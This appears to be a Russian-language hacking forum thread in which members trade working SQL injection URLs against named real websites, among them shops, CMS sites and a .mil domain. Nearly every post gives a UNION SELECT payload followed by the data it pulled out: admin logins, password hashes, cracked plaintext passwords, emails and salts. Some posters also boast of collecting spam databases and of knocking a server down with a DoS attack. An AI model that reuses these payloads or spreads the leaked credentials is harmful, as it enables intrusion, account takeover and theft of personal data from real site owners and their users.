http://www.masarykovazs.eu/index.php?clanek=-155+union+select+0,column_name,2,3,4,5,6,7,8,9,10, 11+from+inf ormation_schema.columns/*
visit-palawan.com
http://www.visit-palawan.com/picture_gallery.php?categories=63&select_cate=63+union+select+0,1,concat(USER (),0x3a,VERSION(),0x3a,DATABASE())/*
http://www.visit-palawan.com/picture_gallery.php?categories=63&select_cate=63+union+select+0,1,concat(tabl e_name)+from+information_schema.tables/*
http://www.visit-palawan.com/picture_gallery.php?categories=63&select_cate=63+union+select+0,1,column_name +from+information_schema.columns/*
sitedefteri.com
http://www.sitedefteri.com/sitegit.php?id=-2833+union+select+0,1,2,3,concat(USER(),0x3a,VERSI ON(),0x3a,DAT ABASE()),5,6,7,8,9,10,11,12,13,14,15/*
root@localhost:5.0.32-Debian_7etch3-log:linkdefteri
http://www.sitedefteri.com/sitegit.php?id=-2833+union+select+0,1,2,3,table_name,5,6,7,8,9,10, 11,12,13,14,1 5+from+information_schema.tables/*
http://www.sitedefteri.com/sitegit.php?id=-2833+union+select+0,1,2,3,column_name,5,6,7,8,9,10 ,11,12,13,14, 15+from+information_schema.columns/*
toy-icti.org
http://www.toy-icti.org/newsletter/index.php?NID=299999+union+select+0,1,concat(USER( ),0x3a,VERSION(),0x3a ,DATABASE()),3/*
seekwell@localhost:4.0.22-Max:SWicti-06

159932

08.02.2008, 22:23

http://www.rooid.ru/index.php?action=staties&id=-9+union+select+1,2,concat_ws(0x3a,username,user_pa ssword),4,5,6,7+from+phpbb_users/*
5.0.32-Debian_7etch5-log
Админы форума:
Admin:6689263e6df1fbd89377d1dac02f87b0:125040
Stan:0057f84026c20b2a4cdeaf15824773bb:arowana
-----------------------------------------------------
http://www.eurohold.bg/presscenter.php?page=news&id=-286+union+select+1,concat_ws(0x3a,username,passwor d,status),3,4,5,6+from+administrators+limit+0,1/*
5.0.45-log
admin:5569aeb9a91a05eac4bb0186116e44c7

fobofob

09.02.2008, 01:22

http://www4.army.mil/otf/story.php?id=-56%20UNION%20SELECT%201,2,concat_ws(0x3,version(), user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,1 6+FROM+users/*

Дальше раскрыть не удалось...
энто боян,попробуй найти инъекцию на другом сайте в домене .mil ;) :D

CaNNabi$

09.02.2008, 13:31

http://www.cristianos.com/wp-content/plugins/wp-cal/functions/editevent.php?%20id=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email),%203,4,5,6%20from%20wp_user s--
arimel:88589699a8524d14a7fafc60a18f7644:arimel@gma il.com

Путь к админке http://www.cristianos.com/wp-login.php
login arimel
pass anika@99

Кажется прально все оформил) просто первый раз в этом разделе) так что не пинайте :) , если что скажите исправлюсь ; )

satana8920

09.02.2008, 13:46

http://kaleydoskop.com.ua/index.php?plugin=katalog&do=showUserContent&type=firms&id=index.php?plugin=katalog&do=showUserContent&type=tovars&id=-395'+union+select+1,2,3,4,5,concat_ws(0x3a3a,id,lo gin,pwd,email),7,8,9,10,11,12,13,14,15,16,17,18+fr om+mix_users+limit+1,1/*
11::administrator::070670bb5da95b97f378e4b1a5a954d a::info@natalie-lamotte.com

http://www.sahm.com.ua/index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,id, login,pwd,email),5,6,7,8,9,10,11,12+from+ng_users/*&cat=11
12::admin::670266c7724d26d023f1326f1020e919::eduar d.rapoport@pak-era.com
11::administrator::670266c7724d26d023f1326fb070c1d 0::admin@sahm.com.ua

nex0

09.02.2008, 21:21

activision2007.es (сайт испаского Activision)
http://www.activision2007.es/juego.php?jid=-125+union+select+1,2,convert(concat(version(),0x3a ,user(),0x3a,database()),binary),4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38
version() 4.1.18-nt :mad: :mad: :mad:
user() DBActivision27@localhost
database() gestion

табла usuario ~75000 юзеров!!! (узнал лимитом)
с трудом нашел колонки id, nombre, email......
http://www.activision2007.es/juego.php?jid=-125+union+select+1,2,3,convert(concat(id,0x3a,nomb re,0x3a,email),binary),5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38+from+usuario+limit+0,100000
колонку с пассами мне не удалось найти=// так что пробуйте
p.s.потом я разозлился и отправил сервер bеnchmаrk'ом в глубокий DoS/ (часов 5 уже не работает)

ardana.ru
http://www.ardana.ru/products/product.php?gid=-1+union+select+1,2,3,4,concat(version(),0x3a,user( ),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19/*
version() 4.1.22-standard
user() ardana_ardana@localhost
database() ardana_ardana

otvet.su
http://www.otvet.su/tovar.php?gid=999999+union+select+1,concat(version (),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
version() 5.0.24-standard
user() otvet1@localhost
database() db_otvet1

abandoneer.com
http://abandoneer.com/games.php?gameid=99999999/**/union/**/select/**/1,concat(version(),0x3a,user(),0x3a,database()),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25/*
version() 4.1.21-log
user() evilrafael@localhost
database() evilrafael

CaNNabi$

10.02.2008, 00:39

http://www.sahm.com.ua/index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,ver sion(),user(),database()),5,concat_ws(0x3a3a,versi on(),user(),database()),7,8,9,10,11,12/*&cat=11users%20id::login::pwd::email

4.1.20::sahm_user1@localhost::sahm_db

http://www.dharmahealing.org/index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null ,null,null,null,null/**/from/**/mos_users/*
supercristal:bdbfdaa664e59fd3f2ef5a51f0688e10

http://sacredaeon.com/index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null ,null,null,null,null/**/from/**/mos_users/*
supercristal:e5fe262def0b72b051d9d11301cde9b9

http://www.torcidaforcajovem.net/index.php?option=com_musepoes&task=answer&Itemid=s@bun&catid=s@bun&aid=-1/**/union/**/select/**/0,username,password,0x3a,0x3a,3,0,0x3a,0,4,4,4,0,0 x3a,0,5,5,5,0,0x3a/**/from/**/mos_users/*
admin:a1c3c4ff7c9a2064f788db3eb8a5fb49

http://www.xcsport.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt, 7,8,9,10+from+runcms_users+where+uid=2
b983:6e321306ec723a50ee62d01f21638bb2f72e4592

http://www.rusquilt.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt, 7,8,9,10+from+runcms_users+where+uid=2
7ae1:3dc58f7e1db2d269fadf0f519315f264db969552

Терь второй раз попробуем, если хэши расшифрованными кидать тогда виноват, просто уже тут видел, что выложивали не расшифрованным (конечно я пробывал рсшифровать), еще раз попрошу чтоб не пинали если че не так) исправлюсь)

Велемир

10.02.2008, 03:55

KPOT_f!nd

10.02.2008, 05:09

http://www.mumbles.co.uk/shopinfo.php?ID=-18773+union+select+table_name,2,3,4,5,6,7,8,9,10,1 1,12,13,14+from+information_schema.tables+limit+50 ,1/*

http://www.mumbles.co.uk/shopinfo.php?ID=-18773+union+select+concat(Username,0x3a,Password,0 x3a,FromPage,0x3a,Email,0x3a,MobileNumber,0x3a,),2 ,3,4,5,6,7,8,9,10,11,12,13,14+from+UsersInfo+limit +10,1/*

Лимитом работаем, 5 версия дядя мускуля )

satana8920

10.02.2008, 05:58

от нечего делать пробежался по шопам
http://www.littlepinkshop.com/shop/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.genesissurfshop.com/shop/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.naturallydoesit.co.uk/shop/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.healthbeyond2000.co.nz/shop/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.patriciawatson.net/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://simplybearings.com/shop/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*

Собираем спам Базы чистый валид 99 %

lexa007

10.02.2008, 11:11

http://www.multyclub.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, %20%200,0,0,0/**/from/**/jos_users/*

http://kinofant.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, %20%200,0,0,0/**/from/**/jos_users/*

Webmaster
bespredel12

Sleep

10.02.2008, 13:33

http://www.programas-hacker.com/html/modules.php?name=Downloads&d_op=modifydownloadrequest&lid=-1+UNION+SELECT+0,1,2,table_name,1,1,4,0,0+FROM+inf ormation_schema.tables
http://www.programas-hacker.com/html/modules.php?name=Downloads&d_op=modifydownloadrequest&lid=-1+UNION+SELECT+0,1,2,aid,1,1,4,0,0+FROM+nuke_autho rs+where+radminsuper=1
WeKe:98eb438495ae86cf58689cee138c6f57
Зы какойто хак ресурс :D

CaNNabi$

10.02.2008, 13:39

http://www.wallables.com/catalog/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.tickettoride.org.uk/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.sci-mentor.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.naturalheating.co.uk/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.makeupbyarmando.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
https://sunrisehealthcoach.sslpowered.com/catalog/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.kutukutubuku.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.littlesunflowers.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
http://www.exeltek.com.au/secure/catalog/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*

SWAT

10.02.2008, 14:27

http://www.diaetverzeichnis.de/news.php?id=-1%27%20union%20select%201,username,password,4,5%20 from%20dir_admins/*

http://1awningdirectory.com/news.php?id=-1%27%20union%20select%201,username,password,4,5%20 from%20dir_admins/*

http://www.halonbank.pl/index.php?group=-1+UNION+SELECT+1,VERSION(),3/*

CaNNabi$

10.02.2008, 17:38

http://tekno-tel.com.tr/index.php?option=com_neorecruit&task=offer_view&id=369852+UNION+SELECT+1,concat(username,0x3a,pass word),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25+FROM+jos_users--

admin:319e55412bb74b020ed3f3a234abd467
login admin
pass cenk

http://www.martimarket.com/marti/index.php?option=com_neorecruit&task=offer_view&id=369852+UNION+SELECT+1,concat(username,0x3a,pass word),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25+FROM+jos_users--

admin:c46a6b1297f0a201ba45276c97487886:PAWU6dFjN5U KqBqy

http://www.nounouchelanou.com/index.php?option=com_neorecruit&task=offer_view&id=369852+UNION+SELECT+1,concat(username,0x3a,pass word),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25+FROM+jos_users--

admin:6d9556fe5e923f525bd376b5269318b4

http://www.kinayperde.com/index.php?option=com_neorecruit&task=offer_view&id=369852+UNION+SELECT+1,concat(username,0x3a,pass word),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25+FROM+jos_users--

admin:bd0d324fd449c451d27e287e3c6e6af4

http://www.afbdcn.113t.info/index.php?option=com_neorecruit&task=offer_view&id=369852+UNION+SELECT+1,concat(username,0x3a,pass word),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25+FROM+jos_users--

Will:05f2cb7fe7346197f105afd7af4dd026:w5pYowRB0DCp iIiZ

http://supermaringa.com/index.php?option=com_neorecruit&task=offer_view&id=369852+UNION+SELECT+1,concat(username,0x3a,pass word),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25+FROM+jos_users--

mandarinus:e28aafeef6b3b3dc297d39dcab223d45:ds57L9 nOm9V0imMx

Велемир

10.02.2008, 19:45

159932

10.02.2008, 20:09

http://www.big6.com/showarticle.php?id=-16+union+select+concat(username,0x3a,user_id),1,2, 3,4+from+big6_users+limit+68,1/*

1.Дальше не вышло,не подобрать мне поля пароля :Р
2.ДОС тут мона провести?)

http://www.big6.com/showarticle.php?id=-16+union+select+concat(username,0x3a,user_password ),1,2,3,4+from+big6_users+limit+1,1/*

altosburg:165d048d997eebc4bc3aefd47feddbf2:bDrlLmb 295

CaNNabi$

10.02.2008, 21:48

www.russianstreets.ru русские улицы)

http://russianstreets.ru/portal/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt, 7,8,9,10+from+runcms_users+where+uid=2

2292:27c27680c60d01a3d8e475240c939205225ccb1a

www.atpc.ru про фотошо, веб програмировение и т.д.)

http://atpc.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt, 7,8,9,10+from+runcms_users+where+uid=2

1a4f:1181e27c6638e80849094d2e0966f37a9072d1d0

www.housefind.ru че то про недвижимость)

http://housefind.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt, 7,8,9,10+from+runcms_users+where+uid=2

20da:b56a3d1f438b73afc451937e699969df9fba86a2

www.night.su никто не хочет в ночные клубы Москвы

http://night.su/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt, 7,8,9,10+from+runcms_users+where+uid=2

6fc9:477bde830dd48056f8dba9d43e70d7cc8103bd93

www.kitchenz.ru кулинарам сюда)

http://kitchenz.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt, 7,8,9,10+from+runcms_users+where+uid=2

2817:b94713de6a8efa6091262460fb1eced95d108a4c

www.medfind.ru медецина)

http://medfind.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt, 7,8,9,10+from+runcms_users+where+uid=2

429a:b56a3d1f438b73afc451937e699969df9fba86a2

www.stop-dieta.com против диеты)))

http://www.stop-dieta.com/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt, 7,8,9,10+from+runcms_users+where+uid=2

0933:8b3adfeb5c4380ff9da37b2d7d500b2cbf25f790

www.vfgieu.ru филиал какого то универа не короч че то там)

http://www.vfgieu.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt, 7,8,9,10+from+runcms_users+where+uid=2

63f5:e2a6a026d820802d28da72c53ea7960539b9ce71

www.nkamsk.name Новости Нижнекамска (городской портал кажется)))

http://nkamsk.name/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt, 7,8,9,10+from+runcms_users+where+uid=2

c4b6:2c4f19dcdd338c700ca350214b5b3c2094d96b6c

www.kerben.org какой то Кыргызский сайт кажется)

http://www.kerben.org/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt, 7,8,9,10+from+runcms_users+where+uid=2

8504:bba57d5597ca1249e69e61b870f89a62b9273930

www.make-up.by Косметика) минералы с Мертвого моря))

http://www.make-up.by/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt, 7,8,9,10+from+runcms_users+where+uid=2

918c:8c15408d26cec74dd28a945e2cf28f9a3c684f11

www.rsp-ufa.ru коме Републиканская Стамоталогия?)

http://www.rsp-ufa.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt, 7,8,9,10+from+runcms_users+where+uid=2

77e8:a2ceeb92aaaa985d41ee276bf5fcdf0f9b24fd13

www.dtp38.ru какая то автогражданка по русски :D

http://dtp38.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt, 7,8,9,10+from+runcms_users+where+uid=2

bc25:bc0c5764022f27adcf9b600c0b8a920c227d36e2

www.auto.nkamsk.name че то про автомобили)

http://www.auto.nkamsk.name/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt, 7,8,9,10+from+runcms_users+where+uid=2

f894:b6746140b60a76f50f8fc5ca804dca41944649dc

Я не могу остановиться :( все равно дальше делаю это же SQL, ща наверно еще выложу

satana8920

11.02.2008, 09:44

вот еще вам
http://szinkronnelkul.com/index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6/**/FROM/**/admin/*admin=1

http://mypageranking.net/index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6/**/FROM/**/admin/*%20admin=1
admin:admin
http://everything2.com/index.pl?node_id=0/**/UNION/**/SELECT/**/null,101,null,1,null,null,passwd,null,null,nick,nu ll/**/FROM/**/user/**/WHERE/**/nick/**/!%3d/**/''/**/%23
http://av.nkphospital.com/main/index.php?area=1&p=downloads&categ=-1+union+select+1,concat(email,0x3a,pass),3+from+kp ro_user/*
Audio_80@hotmail.com:39271cf0b30b9f91afb9dc9d19b96 1af:520253
ЗЫ так сказать утреньяя зарядка :D

it's my

11.02.2008, 11:39

http://www.onderhoudsmiddelen.com/111.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a ,database()),3,4,5/*

kair

11.02.2008, 11:42

osCommerce Addon Customer Testimonials 3.1
https://www.silverliningboutique.com/customer_testimonials.php?testimonial_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*

it's my

11.02.2008, 11:45

http://www.smabbs-bogor.net/temp.php?lempar=almost.php&&id=-1+union+select+1,concat(user_name,0x3a,password),3 ,4,5,6+from+user_login/*

VarisH:00ba80d60e631918488e6d3703d9d184
alfin:017abbc00348b7a340877c6d13fb6cef
secret:9a618248b64db62d15b300a07b00580b
teddy:122d7e77ee418122ec3cf286a28a9d88

lexa007

11.02.2008, 15:03

http://dmredcross.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, %20%200,0,0,0/**/from/**/jos_users/*

http://www.yeisk-kurort.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, %20%200,0,0,0/**/from/**/jos_users/*

http://www.softservice.by/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, %20%200,0,0,0/**/from/**/jos_users/*

http://www.orizona.info/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, %20%200,0,0,0/**/from/**/jos_users/*

http://540-731.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, %20%200,0,0,0/**/from/**/jos_users/*

http://internetconsulting.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, %20%200,0,0,0/**/from/**/jos_users/*

rankor777

11.02.2008, 16:41

http://www.robotech.com/news/sortnews.php?categoryid=10+order+by+1/*

а дальше хз )

rankor777

11.02.2008, 17:01

вот еще:
http://syracuselivemusic.com/messageboards.php?type=general_mb&id=1+order+by+2/*

rankor777

11.02.2008, 17:29

http://thestarclub.org/tour/detail.php?id=1+union+select+1,2,user(),4/* а как пароль достать йа не знаю (

rankor777

11.02.2008, 17:42

http://www.e-nygma.be/muse/movie.php?id=1+order+by+14/*

Ky3bMu4

11.02.2008, 17:54

it's my

00ba80d60e631918488e6d3703d9d184:SALSA
9a618248b64db62d15b300a07b00580b:supersecret

rankor777

11.02.2008, 18:01

http://avtovaz.ru/model_info.php?id=23408+order+by+14/*

lexa007

11.02.2008, 20:01

http://www.mitsar.info/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, %20%200,0,0,0/**/from/**/jos_users/*

http://www.skodapart.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, %20%200,0,0,0/**/from/**/jos_users/*

http://www.murmansecurity.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, %20%200,0,0,0/**/from/**/jos_users/*

http://www.tnn-plus.ru/http://www.murmansecurity.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, %20%200,0,0,0/**/from/**/jos_users/*

http://reenergy.by/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, %20%200,0,0,0/**/from/**/jos_users/*

$n@ke

11.02.2008, 22:20

вроде небыло.в поиске пусто.

EDU
http://caeff.ces.clemson.edu/content/?id=-3+union+select+1,concat_ws(char(58),TABLE_SCHEMA,t able_name,column_name),3,4+from+information_schema .columns/*

lexa007

11.02.2008, 23:04

http://support.gateway.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, %20%200,0,0,0/**/from/**/jos_users/*

http://www.psy-con.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, %20%200,0,0,0/**/from/**/jos_users/*

http://www.yourczech.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, %20%200,0,0,0/**/from/**/jos_users/*

http://paramedik.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0, %20%200,0,0,0/**/from/**/jos_users/*

CaNNabi$

11.02.2008, 23:26

http://getawebsite.co.za/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*

therondp:cfef632b3d7e57efb0f30c5ff9e91abf:BsmotIJa El4n7U1e

http://www.bacanak.net/1/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*

bacanak:26038c3e7eb3efb12aac8afa64b8aec1

http://www.lppa.org.ls/index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSW ORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+fro m+mos_content_comments+where+1=1

admin:21232f297a57a5a743894a0e4a801fc3
admin:admin

http://www.guvengrafik.com/tr/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*
хостер кажется) и домены регает)
administrator:90486f2dcc50866c520f11ff7bb467c6:yj

http://www.chkms.ch/cms/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*
тоже хостер кажется)
admin:8f539ba7f137838d79190c4fbf4c7fcf:eDSKldF6i9w jTBhk

http://www.seventystudio.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*

admin:7d63bf9dd9782614b7a8ad08471efdab:ELjNXMlvo6W JXDK2

http://www.soulofthenet.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PAS SWORD)+FROM+jos_users+LIMIT+1/*

admin:b99e3a9bb071a4a1bf92b999855677fd

Велемир

12.02.2008, 00:39

http://www.dsl-ru.de/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,table_name,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/information_schema.tables/*

Не вышло((

~EviL~

12.02.2008, 00:52

Возможно вы имели ввиду:

http://www.dsl-ru.de/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=1+UNION+SELECT+1,convert(concat_ws(0x3a,versio n(),user(),database())+using+latin1),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20/*

Велемир

12.02.2008, 01:09

Я по образцу делал,думал прокатит- такого метода вообще не встречал.Мошь опишешь вкратце.что ты сделал? Я понял,что ты преобразовал в латин...А почему так не знаю(.И гайдов я таких не видел...........................

satana8920

12.02.2008, 02:58

http://www.champ.co.za/clients/comments.php?id=-1/**/UNION/**/SELECT/**/name,password,null,null,null,null,null,null,null,n ull,null/**/FROM/**/wsnguest_members/*

http://littlelindsay.com/guest/comments.php?id=-1/**/UNION/**/SELECT/**/name,password,null,null,null,null,null,null,null,n ull,null/**/FROM/**/wsnguest_members/*

http://www.svg-soccer.de/B1/gbook/comments.php?id=-1/**/UNION/**/SELECT/**/name,password,null,null,null,null,null,null,null,n ull,null/**/FROM/**/wsnguest_members/*

http://www.paulnicholasonline.com/guestbook/comments.php?id=-1/**/UNION/**/SELECT/**/name,password,null,null,null,null,null,null,null,n ull,null/**/FROM/**/wsnguest_members/*

http://www.djmanumax.nl/guestbook/comments.php?id=-1/**/UNION/**/SELECT/**/name,password,null,null,null,null,null,null,null,n ull,null/**/FROM/**/wsnguest_members/*
сдесь даже хеши побрутил =)))
вот то что осилил
D@|\\||\\|Y:daa823a5957eb5bf86d93b22473cc241:eltax
cemonvicta:1a9e8503f4f1a5a08d550aee1fb9ae05:suiker vrij
PS по ходу я сегодня спать то не буду да?! завтра наботу веть (((